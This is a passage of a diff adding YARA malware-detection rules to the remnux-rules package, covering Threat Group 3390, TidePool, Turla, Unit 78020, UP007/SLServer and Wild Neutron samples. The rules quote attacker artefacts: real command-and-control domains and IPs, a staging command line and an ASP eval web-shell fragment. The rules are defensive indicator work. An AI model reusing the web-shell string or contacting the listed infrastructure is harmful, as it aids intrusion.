+		hash1 = "c57c5a2c322af2835ae136b75283eaaeeaa6aa911340470182a9983ae47b8992"
+		hash2 = "dfa984174268a9f364d856fd47cfaca75804640f849624d69d81fcaca2b57166"
+	strings:
+		$s1 = "navlu.dll.urlUT" fullword ascii
+		$s2 = "VPDN_LU.exeUT" fullword ascii
+		$s3 = "pnipcn.dllUT" fullword ascii
+		$s4 = "\\ssonsvr.exe" fullword ascii
+		$s5 = "/c del /q %s" fullword ascii
+		$s6 = "\\setup.exe" fullword ascii 
+		$s7 = "msi.dllUT" fullword ascii
+
+		$op0 = { 8b 45 0c 83 38 00 0f 84 98 } /* Opcode */
+		$op1 = { e8 dd 07 00 00 ff 35 d8 fb 40 00 8b 35 7c a0 40 } /* Opcode */
+		$op2 = { 83 fb 08 75 2c 8b 0d f8 af 40 00 89 4d dc 8b 0d } /* Opcode */
+		$op3 = { c7 43 18 8c 69 40 00 e9 da 01 00 00 83 7d f0 00 } /* Opcode */
+		$op4 = { 6a 01 e9 7c f8 ff ff bf 1a 40 00 96 1b 40 00 01 } /* Opcode */
+	condition:
+		uint16(0) == 0x5a4d and filesize < 400KB and 3 of ($s*) and 1 of ($op*)
+}
+
+rule ThreatGroup3390_Strings {
+	meta:
+		description = "Threat Group 3390 APT - Strings"
+		author = "Florian Roth"
+		reference = "http://snip.ly/giNB"
+		date = "2015-08-06"
+		score = 60
+	strings:
+		$s1 = "\"cmd\" /c cd /d \"c:\\Windows\\Temp\\\"&copy" ascii
+		$s2 = "svchost.exe a -k -r -s -m5 -v1024000 -padmin-windows2014"
+		$s3 = "ren *.rar *.zip" fullword ascii
+		$s4 = "c:\\temp\\ipcan.exe" fullword ascii
+		$s5 = "<%eval(Request.Item(\"admin-na-google123!@#" ascii
+	condition:
+		1 of them and filesize < 30KB
+}
+
+rule ThreatGroup3390_C2 {
+	meta:
+		description = "Threat Group 3390 APT - C2 Server"
+		author = "Florian Roth"
+		reference = "http://snip.ly/giNB"
+		date = "2015-08-06"
+		score = 60
+	strings:
+		$s1 = "api.apigmail.com"
+		$s2 = "apigmail.com"
+		$s3 = "backup.darkhero.org"
+		$s4 = "bel.updatawindows.com"
+		$s5 = "binary.update-onlines.org"
+		$s6 = "blackcmd.com"
+		$s7 = "castle.blackcmd.com"
+		$s8 = "ctcb.blackcmd.com"
+		$s9 = "darkhero.org"
+		$s10 = "dav.local-test.com"
+		$s11 = "test.local-test.com"
+		$s12 = "dev.local-test.com"
+		$s13 = "ocean.local-test.com"
+		$s14 = "ga.blackcmd.com"
+		$s15 = "helpdesk.blackcmd.com"
+		$s16 = "helpdesk.csc-na.com"
+		$s17 = "helpdesk.hotmail-onlines.com"
+		$s18 = "helpdesk.lnip.org"
+		$s19 = "hotmail-onlines.com"
+		$s20 = "jobs.hotmail-onlines.com"
+		$s21 = "justufogame.com"
+		$s22 = "lnip.org"
+		$s23 = "local-test.com"
+		$s24 = "login.hansoftupdate.com"
+		$s25 = "long.update-onlines.org"
+		$s26 = "longlong.update-onlines.org"
+		$s27 = "longshadow.dyndns.org"
+		$s28 = "longshadow.update-onlines.org"
+		$s29 = "longykcai.update-onlines.org"
+		$s30 = "lostself.update-onlines.org"
+		$s31 = "mac.navydocument.com"
+		$s32 = "mail.csc-na.com"
+		$s33 = "mantech.updatawindows.com"
+		$s34 = "micr0soft.org"
+		$s35 = "microsoft-outlook.org"
+		$s36 = "mtc.navydocument.com"
+		$s37 = "navydocument.com"
+		$s38 = "mtc.update-onlines.org"
+		$s39 = "news.hotmail-onlines.com"
+		$s40 = "oac.3322.org"
+		$s41 = "ocean.apigmail.com"
+		$s42 = "pchomeserver.com"
+		$s43 = "registre.organiccrap.com"
+		$s44 = "security.pomsys.org"
+		$s45 = "services.darkhero.org"
+		$s46 = "sgl.updatawindows.com"
+		$s47 = "shadow.update-onlines.org"
+		$s48 = "sonoco.blackcmd.com"
+		$s49 = "test.logmastre.com"
+		$s50 = "up.gtalklite.com"
+		$s51 = "updatawindows.com"
+		$s52 = "update-onlines.org"
+		$s53 = "update.deepsoftupdate.com"
+		$s54 = "update.hancominc.com"
+		$s55 = "update.micr0soft.org"
+		$s56 = "update.pchomeserver.com"
+		$s57 = "urs.blackcmd.com"
+		$s58 = "wang.darkhero.org"
+		$s59 = "webs.local-test.com"
+		$s60 = "word.apigmail.com"
+		$s61 = "wordpress.blackcmd.com"
+		$s62 = "working.blackcmd.com"
+		$s63 = "working.darkhero.org"
+		$s64 = "working.hotmail-onlines.com"
+		$s65 = "www.trendmicro-update.org"
+		$s66 = "www.update-onlines.org"
+		$s67 = "x.apigmail.com"
+		$s68 = "ykcai.update-onlines.org"
+		$s69 = "ykcailostself.dyndns-free.com"
+		$s70 = "ykcainobody.dyndns.org"
+		$s71 = "zj.blackcmd.com"
+		$s72 = "laxness-lab.com"
+		$s73 = "google-ana1ytics.com"
+		$s74 = "www.google-ana1ytics.com"
+		$s75 = "ftp.google-ana1ytics.com"
+		$s76 = "hotmailcontact.net"
+		$s77 = "208.115.242.36"
+		$s78 = "208.115.242.37"
+		$s79 = "208.115.242.38"
+		$s80 = "66.63.178.142"
+		$s81 = "72.11.148.220"
+		$s82 = "72.11.141.133"
+		$s83 = "74.63.195.236"
+		$s84 = "74.63.195.236"
+		$s85 = "74.63.195.237"
+		$s86 = "74.63.195.238"
+		$s87 = "103.24.0.142"
+		$s88 = "103.24.1.54"
+		$s89 = "106.187.45.162"
+		$s90 = "192.151.236.138"
+		$s91 = "192.161.61.19"
+		$s92 = "192.161.61.20"
+		$s93 = "192.161.61.22"
+		$s94 = "103.24.1.54"
+		$s95 = "67.215.232.179"
+		$s96 = "96.44.177.195"
+		$s97 = "49.143.192.221"
+		$s98 = "67.215.232.181"
+		$s99 = "67.215.232.182"
+		$s100 = "96.44.182.243"
+		$s101 = "96.44.182.245"
+		$s102 = "96.44.182.246"
+		$s103 = "49.143.205.30"
+		$s104 = "working_success@163.com"
+		$s105 = "ykcaihyl@163.com"
+		$s106 = "working_success@163.com"
+		$s107 = "yuming@yinsibaohu.aliyun.com"
+	condition:
+		uint16(0) == 0x5a4d and 1 of them
+}
diff -Nru remnux-rules-0.0.3/yara/malware/APT_TidePool.yar remnux-rules-0.0.4/yara/malware/APT_TidePool.yar
--- remnux-rules-0.0.3/yara/malware/APT_TidePool.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/APT_TidePool.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,35 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+/*
+	Yara Rule Set
+	Author: Florian Roth
+	Date: 2016-05-24
+	Identifier: TidePool (Ke3chang)
+*/
+
+rule TidePool_Malware {
+	meta:
+		description = "Detects TidePool malware mentioned in Ke3chang report by Palo Alto Networks"
+		author = "Florian Roth"
+		reference = "http://goo.gl/m2CXWR"
+		date = "2016-05-24"
+		hash1 = "9d0a47bdf00f7bd332ddd4cf8d95dd11ebbb945dda3d72aac512512b48ad93ba"
+		hash2 = "67c4e8ab0f12fae7b4aeb66f7e59e286bd98d3a77e5a291e8d58b3cfbc1514ed"
+		hash3 = "2252dcd1b6afacde3f94d9557811bb769c4f0af3cb7a48ffe068d31bb7c30e18"
+		hash4 = "38f2c86041e0446730479cdb9c530298c0c4936722975c4e7446544fd6dcac9f"
+		hash5 = "9d0a47bdf00f7bd332ddd4cf8d95dd11ebbb945dda3d72aac512512b48ad93ba"
+	strings:
+		$x1 = "Content-Disposition: form-data; name=\"m1.jpg\"" fullword ascii
+		$x2 = "C:\\PROGRA~2\\IEHelper\\mshtml.dll" fullword wide
+		$x3 = "C:\\DOCUME~1\\ALLUSE~1\\IEHelper\\mshtml.dll" fullword wide
+		$x4 = "IEComDll.dat" fullword ascii
+
+		$s1 = "Content-Type: multipart/form-data; boundary=----=_Part_%x" fullword wide
+		$s2 = "C:\\Windows\\System32\\rundll32.exe" fullword wide
+		$s3 = "network.proxy.socks_port\", " fullword ascii
+	condition:
+		( uint16(0) == 0x5a4d and filesize < 200KB and ( 1 of ($x*) ) ) or ( 4 of them )
+}
diff -Nru remnux-rules-0.0.3/yara/malware/APT_Turla_RUAG.yar remnux-rules-0.0.4/yara/malware/APT_Turla_RUAG.yar
--- remnux-rules-0.0.3/yara/malware/APT_Turla_RUAG.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/APT_Turla_RUAG.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,146 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+/*
+	Yara Rule Set
+	Author: Florian Roth
+	Date: 2016-06-09
+	Identifier: Turla Samples from RUAG Cyber Attack
+*/
+
+/* Rule Set ----------------------------------------------------------------- */
+
+rule Turla_APT_srsvc {
+	meta:
+		description = "Detects Turla malware (based on sample used in the RUAG APT case)"
+		author = "Florian Roth"
+		family = "Turla"
+		reference = "https://www.govcert.admin.ch/blog/22/technical-report-about-the-ruag-espionage-case"
+		date = "2016-06-09"
+		hash1 = "65996f266166dbb479a42a15a236e6564f0b322d5d68ee546244d7740a21b8f7"
+		hash2 = "25c7ff1eb16984a741948f2ec675ab122869b6edea3691b01d69842a53aa3bac"
+	strings:
+		$x1 = "SVCHostServiceDll.dll" fullword ascii
+
+		$s2 = "msimghlp.dll" fullword wide
+		$s3 = "srservice" fullword wide
+		$s4 = "ModStart" fullword ascii
+		$s5 = "ModStop" fullword ascii
+	condition:
+		( uint16(0) == 0x5a4d and filesize < 20KB and ( 1 of ($x*) or all of ($s*) ) )
+		or ( all of them )
+}
+
+rule Turla_APT_Malware_Gen1 {
+	meta:
+		description = "Detects Turla malware (based on sample used in the RUAG APT case)"
+		author = "Florian Roth"
+		family = "Turla"
+		reference = "https://www.govcert.admin.ch/blog/22/technical-report-about-the-ruag-espionage-case"
+		date = "2016-06-09"
+		hash1 = "0e1bf347c37fb199886f1e675e372ba55ac4627e8be2f05a76c2c64f9b6ed0e4"
+		hash2 = "7206075cd8f1004e8f1f759d46e98bfad4098b8642412811a214c0155a1f08b9"
+		hash3 = "fe3ffd7438c0d38484bf02a78a19ea81a6f51b4b3f2b2228bd21974c2538bbcd"
+		hash4 = "c49111af049dd9746c6b1980db6e150b2a79ca1569b23ed2cba81c85c00d82b4"
+		hash5 = "b62a643c96e2e41f639d2a8ce11d61e6b9d7fb3a9baf011120b7fec1b4ee3cf4"
+		hash6 = "edb12790b5cd959bc2e53a4b369a4fd747153e6c9d50f6a69ff047f7857a4348"
+		hash7 = "8f2ea0f916fda1dfb771f5441e919c561da5b6334b9f2fffcbf53db14063b24a"
+		hash8 = "8dddc744bbfcf215346c812aa569e49523996f73a1f22fe4e688084ce1225b98"
+		hash9 = "0c69258adcc97632b729e55664c22cd942812336d41e8ea0cff9ddcafaded20f"
+		hash10 = "2b4fba1ef06f85d1395945db40a9f2c3b3ed81b56fb9c2d5e5bb693c230215e2"
+	strings:
+		$x1 = "too long data for this type of transport" fullword ascii
+		$x2 = "not enough server resources to complete operation" fullword ascii
+		$x3 = "Task not execute. Arg file failed." fullword ascii
+		$x4 = "Global\\MSCTF.Shared.MUTEX.ZRX" fullword ascii
+
+		$s1 = "peer has closed the connection" fullword ascii
+		$s2 = "tcpdump.exe" fullword ascii
+		$s3 = "windump.exe" fullword ascii
+		$s4 = "dsniff.exe" fullword ascii
+		$s5 = "wireshark.exe" fullword ascii
+		$s6 = "ethereal.exe" fullword ascii
+		$s7 = "snoop.exe" fullword ascii
+		$s8 = "ettercap.exe" fullword ascii
+		$s9 = "miniport.dat" fullword ascii
+		$s10 = "net_password=%s" fullword ascii
+	condition:
+		( uint16(0) == 0x5a4d and filesize < 2000KB and ( 2 of ($x*) or 8 of ($s*) ) )
+		or ( 12 of them )
+}
+
+rule Turla_APT_Malware_Gen2 {
+	meta:
+		description = "Detects Turla malware (based on sample used in the RUAG APT case)"
+		author = "Florian Roth"
+		family = "Turla"
+		reference = "https://www.govcert.admin.ch/blog/22/technical-report-about-the-ruag-espionage-case"
+		date = "2016-06-09"
+		hash1 = "0e1bf347c37fb199886f1e675e372ba55ac4627e8be2f05a76c2c64f9b6ed0e4"
+		hash2 = "7206075cd8f1004e8f1f759d46e98bfad4098b8642412811a214c0155a1f08b9"
+		hash3 = "fe3ffd7438c0d38484bf02a78a19ea81a6f51b4b3f2b2228bd21974c2538bbcd"
+		hash4 = "c49111af049dd9746c6b1980db6e150b2a79ca1569b23ed2cba81c85c00d82b4"
+	strings:
+		$x1 = "Internal command not support =((" fullword ascii
+		$x2 = "L|-1|AS_CUR_USER:OpenProcessToken():%d, %s|" fullword ascii
+		$x3 = "L|-1|CreateProcessAsUser():%d, %s|" fullword ascii
+		$x4 = "AS_CUR_USER:OpenProcessToken():%d" fullword ascii
+		$x5 = "L|-1|AS_CUR_USER:LogonUser():%d, %s|" fullword ascii
+		$x6 = "L|-1|try to run dll %s with user priv|" fullword ascii
+		$x7 = "\\\\.\\Global\\PIPE\\sdlrpc" fullword ascii
+		$x8 = "\\\\%s\\pipe\\comnode" fullword ascii
+		$x9 = "Plugin dll stop failed." fullword ascii
+		$x10 = "AS_USER:LogonUser():%d" fullword ascii
+
+		$s1 = "MSIMGHLP.DLL" fullword wide
+		$s2 = "msimghlp.dll" fullword ascii
+		$s3 = "ximarsh.dll" fullword ascii
+		$s4 = "msximl.dll" fullword ascii
+		$s5 = "INTERNAL.dll" fullword ascii
+		$s6 = "\\\\.\\Global\\PIPE\\" fullword ascii
+		$s7 = "ieuser.exe" fullword ascii
+	condition:
+		( uint16(0) == 0x5a4d and filesize < 2000KB and ( 1 of ($x*) or 5 of ($s*) ) )
+		or ( 10 of them )
+}
+
+rule Turla_APT_Malware_Gen3 {
+	meta:
+		description = "Detects Turla malware (based on sample used in the RUAG APT case)"
+		author = "Florian Roth"
+		family = "Turla"
+		reference = "https://www.govcert.admin.ch/blog/22/technical-report-about-the-ruag-espionage-case"
+		date = "2016-06-09"
+		hash1 = "c49111af049dd9746c6b1980db6e150b2a79ca1569b23ed2cba81c85c00d82b4"
+		hash2 = "b62a643c96e2e41f639d2a8ce11d61e6b9d7fb3a9baf011120b7fec1b4ee3cf4"
+		hash3 = "edb12790b5cd959bc2e53a4b369a4fd747153e6c9d50f6a69ff047f7857a4348"
+		hash4 = "8f2ea0f916fda1dfb771f5441e919c561da5b6334b9f2fffcbf53db14063b24a"
+		hash5 = "8dddc744bbfcf215346c812aa569e49523996f73a1f22fe4e688084ce1225b98"
+		hash6 = "0c69258adcc97632b729e55664c22cd942812336d41e8ea0cff9ddcafaded20f"
+		hash7 = "2b4fba1ef06f85d1395945db40a9f2c3b3ed81b56fb9c2d5e5bb693c230215e2"
+		hash8 = "7206075cd8f1004e8f1f759d46e98bfad4098b8642412811a214c0155a1f08b9"
+		hash9 = "edb12790b5cd959bc2e53a4b369a4fd747153e6c9d50f6a69ff047f7857a4348"
+	strings:
+		$x1 = "\\\\.\\pipe\\sdlrpc" fullword ascii
+		$x2 = "WaitMutex Abandoned %p" fullword ascii
+		$x3 = "OPER|Wrong config: no port|" fullword ascii
+		$x4 = "OPER|Wrong config: no lastconnect|" fullword ascii
+		$x5 = "OPER|Wrong config: empty address|" fullword ascii
+		$x6 = "Trans task %d obj %s ACTIVE fail robj %s" fullword ascii
+		$x7 = "OPER|Wrong config: no auth|" fullword ascii
+		$x8 = "OPER|Sniffer '%s' running... ooopppsss...|" fullword ascii
+
+		$s1 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\User Agent\\Post Platform" fullword ascii
+		$s2 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\User Agent\\Pre Platform" fullword ascii
+		$s3 = "www.yahoo.com" fullword ascii
+		$s4 = "MSXIML.DLL" fullword wide
+		$s5 = "www.bing.com" fullword ascii
+		$s6 = "%s: http://%s%s" fullword ascii
+		$s7 = "/javascript/view.php" fullword ascii
+		$s8 = "Task %d failed %s,%d" fullword ascii
+		$s9 = "Mozilla/4.0 (compatible; MSIE %d.0; " fullword ascii
+	condition:
+		( uint16(0) == 0x5a4d and filesize < 2000KB and ( 1 of ($x*) or 6 of ($s*) ) )
+		or ( 10 of them )
+}
diff -Nru remnux-rules-0.0.3/yara/malware/APT_unit78020_malware.yar remnux-rules-0.0.4/yara/malware/APT_unit78020_malware.yar
--- remnux-rules-0.0.3/yara/malware/APT_unit78020_malware.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/APT_unit78020_malware.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,133 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+*/
+
+/*
+	Yara Rule Set
+	Author: Florian Roth
+	Date: 2015-09-24
+	Identifier: Unit 78020 Malware
+*/
+
+rule Unit78020_Malware_Gen1 {
+	meta:
+		description = "Detects malware by Chinese APT PLA Unit 78020 - Generic Rule"
+		author = "Florian Roth"
+		reference = "http://threatconnect.com/camerashy/?utm_campaign=CameraShy"
+		date = "2015-09-24"
+		hash1 = "2b15e614fb54bca7031f64ab6caa1f77b4c07dac186826a6cd2e254090675d72"
+		hash2 = "76c586e89c30a97e583c40ebe3f4ba75d5e02e52959184c4ce0a46b3aac54edd"
+		hash3 = "2625a0d91d3cdbbc7c4a450c91e028e3609ff96c4f2a5a310ae20f73e1bc32ac"
+		hash4 = "5c62b1d16e6180f22a0cb59c99a7743f44cb4a41e4e090b9733d1fb687c8efa2"
+		hash5 = "7b73bf2d80a03eb477242967628da79924fbe06cc67c4dcdd2bdefccd6e0e1af"
+		hash6 = "88c5be84afe20c91e4024160303bafb044f98aa5fbf8c9f9997758a014238790"
+	strings:
+		$x1 = "greensky27.vicp.net" fullword wide
+		$x2 = "POST http://%s:%d/aspxabcdefg.asp?%s HTTP/1.1" fullword ascii
+		$x3 = "GET http://%s:%d/aspxabcdef.asp?%s HTTP/1.1" fullword ascii
+		/* additional strings based on PDF report - not found in samples */
+		$x4 = "serch.vicp.net" fullword wide
+		$x5 = "greensky27.vicp.net" fullword wide
+		$x6 = "greensky27.vicp.net.as" fullword wide
+		$x7 = "greensky27.vcip.net" fullword wide
+		$x8 = "pnoc-ec.vicp.net" fullword wide
+		$x9 = "aseanph.vicp.net" fullword wide
+		$x10 = "pnoc.vicp.net" fullword wide
+
+		$a1 = "dMozilla/4.0 (compatible; MSIE 6.0;Windows NT 5.0; .NET CLR 1.1.4322)" fullword wide /* typo */
+		$a2 = "User-Agent: Netscape" fullword ascii /* ;) */
+		$a3 = "Accept-Language:En-us/r/n" fullword wide /* typo */
+		$a4 = "\\Office Start.lnk" fullword wide
+		$a5 = "\\MSN Talk Start.lnk" fullword wide
+
+		$s1 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)" fullword wide
+		$s2 = "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-EN; rv:1.7.12) Gecko/20100719 Firefox/1.0.7" fullword ascii
+		$s3 = "%USERPROFILE%\\Application Data\\Mozilla\\Firefox\\Profiles" fullword wide
+		$s4 = "Content-Type:application/x-www-form-urlencoded/r/n" fullword wide
+		$s5 = "Hello World!" fullword wide
+		$s6 = "Accept-Encoding:gzip,deflate/r/n" fullword wide
+		$s7 = "/%d%s%d" fullword ascii
+		$s8 = "%02d-%02d-%02d %02d:%02d" fullword wide
+		$s9 = "WininetMM Version 1.0" fullword wide
+		$s10 = "WININETMM" fullword wide
+		$s11 = "GET %dHTTP/1.1" fullword ascii
+		$s12 = "POST http://%ws:%d/%d%s%dHTTP/1.1" fullword ascii
+		$s13 = "PeekNamePipe" fullword ascii
+		$s14 = "Normal.dot" fullword ascii
+		$s15 = "R_eOR_eOR_eO)CiOS_eO" fullword ascii
+		$s16 = "DRIVE_RAMDISK" fullword wide
+		$s17 = "%s %s %s %s %d %d %d %d " fullword ascii
+	condition:
+		( uint16(0) == 0x5a4d and filesize < 250KB and 1 of ($x*) ) or
+		2 of ($a*) or 
+		6 of ($s*) 
+
+}
+
+rule Unit78020_Malware_1 {
+	meta:
+		description = "Detects malware by Chinese APT PLA Unit 78020 - Specific Rule - msictl.exe"
+		author = "Florian Roth"
+		reference = "http://threatconnect.com/camerashy/?utm_campaign=CameraShy"
+		date = "2015-09-24"
+		hash = "a93d01f1cc2d18ced2f3b2b78319aadc112f611ab8911ae9e55e13557c1c791a"
+	strings:
+		$s1 = "%ProgramFiles%\\Internet Explorer\\iexplore.exe" fullword ascii
+		$s2 = "msictl.exe" fullword ascii
+		$s3 = "127.0.0.1:8080" fullword ascii
+		$s4 = "mshtml.dat" fullword ascii
+		$s5 = "msisvc" fullword ascii
+		$s6 = "NOKIAN95/WEB" fullword ascii
+	condition:
+		uint16(0) == 0x5a4d and filesize < 160KB and 4 of them
+}
+
+rule Unit78020_Malware_Gen2 {
+	meta:
+		description = "Detects malware by Chinese APT PLA Unit 78020 - Generic Rule"
+		author = "Florian Roth"
+		reference = "http://threatconnect.com/camerashy/?utm_campaign=CameraShy"
+		date = "2015-09-24"
+		super_rule = 1
+		hash1 = "76c586e89c30a97e583c40ebe3f4ba75d5e02e52959184c4ce0a46b3aac54edd"
+		hash2 = "7b73bf2d80a03eb477242967628da79924fbe06cc67c4dcdd2bdefccd6e0e1af"
+		hash3 = "981e2fa1ae4145359036b46e8b53cc5da37dd2311204859761bd91572f025e8a"
+	strings:
+		$s0 = "-GetModuleFileNameExW" fullword ascii
+		$s1 = "\\MSN Talk Start.lnk" fullword wide
+		$s2 = ":SeDebugPrivilege" fullword wide
+		$s3 = "WinMM Version 1.0" fullword wide
+		$s4 = "dwError1 = %d" fullword ascii
+		$s5 = "*Can't Get" fullword wide
+	condition:
+		uint16(0) == 0x5a4d and filesize < 1000KB and all of them
+}
+
+rule Unit78020_Malware_Gen3 {
+	meta:
+		description = "Detects malware by Chinese APT PLA Unit 78020 - Generic Rule - Chong"
+		author = "Florian Roth"
+		reference = "http://threatconnect.com/camerashy/?utm_campaign=CameraShy"
+		date = "2015-09-24"
+		super_rule = 1
+		hash1 = "2625a0d91d3cdbbc7c4a450c91e028e3609ff96c4f2a5a310ae20f73e1bc32ac"
+		hash2 = "5c62b1d16e6180f22a0cb59c99a7743f44cb4a41e4e090b9733d1fb687c8efa2"
+	strings:
+		$x1 = "GET http://%ws:%d/%d%s%dHTTP/1.1" fullword ascii
+		$x2 = "POST http://%ws:%d/%d%s%dHTTP/1.1" fullword ascii
+		$x3 = "J:\\chong\\" ascii
+
+		$s1 = "User-Agent: Netscape" fullword ascii
+		$s2 = "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-EN; rv:1.7.12) Gecko/20100719 Firefox/1.0.7" fullword ascii
+		$s3 = "Software\\Microsoft\\Windows\\CurrentVersion\\explorer\\User Shell Folders" fullword wide
+		$s4 = "J:\\chong\\nod\\Release\\SslMM.exe" fullword ascii
+		$s5 = "MM.exe" fullword ascii
+		$s6 = "network.proxy.ssl" fullword wide
+		$s7 = "PeekNamePipe" fullword ascii
+		$s8 = "Host: %ws:%d" fullword ascii
+		$s9 = "GET %dHTTP/1.1" fullword ascii
+		$s10 = "SCHANNEL.DLL" fullword ascii /* Goodware String - occured 6 times */
+	condition:
+		( uint16(0) == 0x5a4d and filesize < 300KB and 1 of ($x*) ) or 
+		4 of ($s*)
+}
diff -Nru remnux-rules-0.0.3/yara/malware/APT_UP007_SLServer.yar remnux-rules-0.0.4/yara/malware/APT_UP007_SLServer.yar
--- remnux-rules-0.0.3/yara/malware/APT_UP007_SLServer.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/APT_UP007_SLServer.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,199 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+rule dubseven_file_set
+{
+    meta:
+        author = "Matt Brooks, @cmatthewbrooks"
+        desc = "Searches for service files loading UP007"
+    
+    strings:
+        $file1 = "\\Microsoft\\Internet Explorer\\conhost.exe"
+        $file2 = "\\Microsoft\\Internet Explorer\\dll2.xor"
+        $file3 = "\\Microsoft\\Internet Explorer\\HOOK.DLL"
+        $file4 = "\\Microsoft\\Internet Explorer\\main.dll"
+        $file5 = "\\Microsoft\\Internet Explorer\\nvsvc.exe"
+        $file6 = "\\Microsoft\\Internet Explorer\\SBieDll.dll"
+        $file7 = "\\Microsoft\\Internet Explorer\\mon"
+        $file8 = "\\Microsoft\\Internet Explorer\\runas.exe"
+        
+    condition:
+        //MZ header
+        uint16(0) == 0x5A4D and
+        
+        //PE signature
+        uint32(uint32(0x3C)) == 0x00004550 and
+        
+        //Just a few of these as they differ
+        3 of ($file*)
+}
+
+rule dubseven_dropper_registry_checks
+{
+    meta:
+        author = "Matt Brooks, @cmatthewbrooks"
+        desc = "Searches for registry keys checked for by the dropper"
+    
+    strings:
+        $reg1 = "SOFTWARE\\360Safe\\Liveup"
+        $reg2 = "Software\\360safe"
+        $reg3 = "SOFTWARE\\kingsoft\\Antivirus"
+        $reg4 = "SOFTWARE\\Avira\\Avira Destop"
+        $reg5 = "SOFTWARE\\rising\\RAV"
+        $reg6 = "SOFTWARE\\JiangMin"
+        $reg7 = "SOFTWARE\\Micropoint\\Anti-Attack"
+
+    condition:
+        //MZ header
+        uint16(0) == 0x5A4D and
+        
+        //PE signature
+        uint32(uint32(0x3C)) == 0x00004550 and
+        
+        all of ($reg*)
+}
+
+rule dubseven_dropper_dialog_remains
+{
+    meta:
+        author = "Matt Brooks, @cmatthewbrooks"
+        desc = "Searches for related dialog remnants. How rude."
+    
+    strings:
+        $dia1 = "fuckMessageBox 1.0" wide
+        $dia2 = "Rundll 1.0" wide
+        
+    condition:
+        //MZ header
+        uint16(0) == 0x5A4D and
+        
+        //PE signature
+        uint32(uint32(0x3C)) == 0x00004550 and
+        
+        any of them
+}
+        
+
+rule maindll_mutex
+{
+    meta:
+        author = "Matt Brooks, @cmatthewbrooks"
+        desc = "Matches on the maindll mutex"
+        ref = "https://citizenlab.org/2016/04/between-hong-kong-and-burma/"
+        
+    strings:
+        $mutex = "h31415927tttt"
+        
+    condition:
+        //MZ header
+        uint16(0) == 0x5A4D and
+        
+        //PE signature
+        uint32(uint32(0x3C)) == 0x00004550 and
+        
+        $mutex
+}
+
+
+rule SLServer_dialog_remains
+{
+    meta:
+        author = "Matt Brooks, @cmatthewbrooks"
+        desc = "Searches for related dialog remnants."
+        ref = "https://citizenlab.org/2016/04/between-hong-kong-and-burma/"
+    
+    strings:
+        $slserver = "SLServer" wide
+        
+    condition:
+        //MZ header
+        uint16(0) == 0x5A4D and
+        
+        //PE signature
+        uint32(uint32(0x3C)) == 0x00004550 and
+        
+        $slserver
+}
+
+rule SLServer_mutex
+{
+    meta:
+        author = "Matt Brooks, @cmatthewbrooks"
+        desc = "Searches for the mutex."
+        ref = "https://citizenlab.org/2016/04/between-hong-kong-and-burma/"
+    
+    strings:
+        $mutex = "M&GX^DSF&DA@F"
+        
+    condition:
+        //MZ header
+        uint16(0) == 0x5A4D and
+        
+        //PE signature
+        uint32(uint32(0x3C)) == 0x00004550 and
+        
+        $mutex
+}
+
+rule SLServer_command_and_control
+{
+    meta:
+        author = "Matt Brooks, @cmatthewbrooks"
+        desc = "Searches for the C2 server."
+        ref = "https://citizenlab.org/2016/04/between-hong-kong-and-burma/"
+    
+    strings:
+        $c2 = "safetyssl.security-centers.com"
+        
+    condition:
+        //MZ header
+        uint16(0) == 0x5A4D and
+        
+        //PE signature
+        uint32(uint32(0x3C)) == 0x00004550 and
+        
+        $c2
+}
+
+rule SLServer_campaign_code
+{
+    meta:
+        author = "Matt Brooks, @cmatthewbrooks"
+        desc = "Searches for the related campaign code."
+        ref = "https://citizenlab.org/2016/04/between-hong-kong-and-burma/"
+    
+    strings:
+        $campaign = "wthkdoc0106"
+        
+    condition:
+        //MZ header
+        uint16(0) == 0x5A4D and
+        
+        //PE signature
+        uint32(uint32(0x3C)) == 0x00004550 and
+        
+        $campaign
+}
+
+rule SLServer_unknown_string
+{
+    meta:
+        author = "Matt Brooks, @cmatthewbrooks"
+        desc = "Searches for a unique string."
+        ref = "https://citizenlab.org/2016/04/between-hong-kong-and-burma/"
+    
+    strings:
+        $string = "test-b7fa835a39"
+        
+    condition:
+        //MZ header
+        uint16(0) == 0x5A4D and
+        
+        //PE signature
+        uint32(uint32(0x3C)) == 0x00004550 and
+        
+        $string
+}
+
diff -Nru remnux-rules-0.0.3/yara/malware/APT_WildNeutron.yar remnux-rules-0.0.4/yara/malware/APT_WildNeutron.yar
--- remnux-rules-0.0.3/yara/malware/APT_WildNeutron.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/APT_WildNeutron.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,293 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+rule WildNeutron_Sample_1 {
+	meta:
+		description = "Wild Neutron APT Sample Rule - file 2b5065a3d0e0b8252a987ef5f29d9e1935c5863f5718b83440e68dc53c21fa94"
+		author = "Florian Roth"
